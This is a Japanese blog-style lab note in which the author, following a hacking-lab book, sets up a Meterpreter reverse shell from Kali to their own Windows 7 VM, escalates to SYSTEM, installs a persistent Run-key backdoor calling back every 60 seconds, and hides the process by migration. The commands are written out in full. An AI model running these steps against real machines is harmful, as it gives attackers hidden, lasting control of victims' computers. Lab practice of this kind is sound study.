参考文献:IPUSIRON著「ハッキング・ラボのつくりかた」を参考に、
自環境のWindows7に自動起動型のバックドアを仕掛けてみました。
1.環境
Kali Linux:192.168.0.15
Windows7(IE8)64bit:192.168.0.26
2.手順
Metasploitの起動
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.0.15
exploit
Windows7側の操作
evil64.exeをWクリックする。
Kali側でWindowsの操作ができるようになります。
getuid
getsystem -t 1
getuid
run persistence -X -i 60 -P windows/x64/meterpreter/reverse_tcp -p 4444 -r 192.168.0.15
実行が成功すると、Windows7側にC:\Users\IEUser\AppData\Local\Temp\zsiLZnhhbo.vbs
が設置され、レジストリ:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
には TlUcLhbidFXCPZP というキーが登録され、即座にvbsが実行されます。
Windows7のリブート後も自動起動されるようになります。
タスクマネージャーのプロセス一覧では
RLoLlqkBXWBI.exeが実行されているのが分かります。




60秒に1回Windows7からKaliに接続を試みるようになり、
kali側でListenしていなければWindowsのイベントログ(アプリケーション)に
アプリケーションエラーが60秒毎に記録されます。



migrate [PID]
でタスクマネージャーに表示されるプロセスが隠蔽されると、
Windows7リブート後もプロセスの隠蔽は反映されます。


3.まとめ
どうやってバックドアが仕掛けられるのか体験することができました。
プロセスの隠蔽まで出来るのは驚きでした。
4章Windowsのハッキングを一通り終えることが出来ました。
IPUSIRON著「ハッキング・ラボのつくりかた」はすごい本です。